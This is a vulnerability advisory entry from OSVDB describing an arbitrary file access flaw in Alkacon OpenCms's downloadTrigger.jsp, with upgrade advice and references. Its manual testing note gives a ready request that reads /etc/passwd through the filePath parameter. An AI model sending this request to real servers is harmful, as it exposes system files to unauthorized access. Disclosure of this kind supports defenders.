Alkacon OpenCms downloadTrigger.jsp filePath Variable Arbitrary File Access

2006-07-21T12:04:08
ID OSVDB:27551
Type osvdb
Reporter Meder Kydyraliev (bugtraq@web.areopag.net)
Modified 2006-07-21T12:04:08

Description

Solution Description

Upgrade to version 6.2.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]/opencms/opencms/system/workplace/admin/workplace/logfileview/downloadTrigger.jsp?filePath=/etc/passwd

References:

Vendor URL: http://www.opencms.org/
Secunia Advisory ID: 21193
Related OSVDB ID: 27552
Related OSVDB ID: 27554
Related OSVDB ID: 27559
Other Advisory URL: http://o0o.nu/~meder/OpenCMS_multiple_vulnerabilities.txt
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0614.html
CVE-2006-3934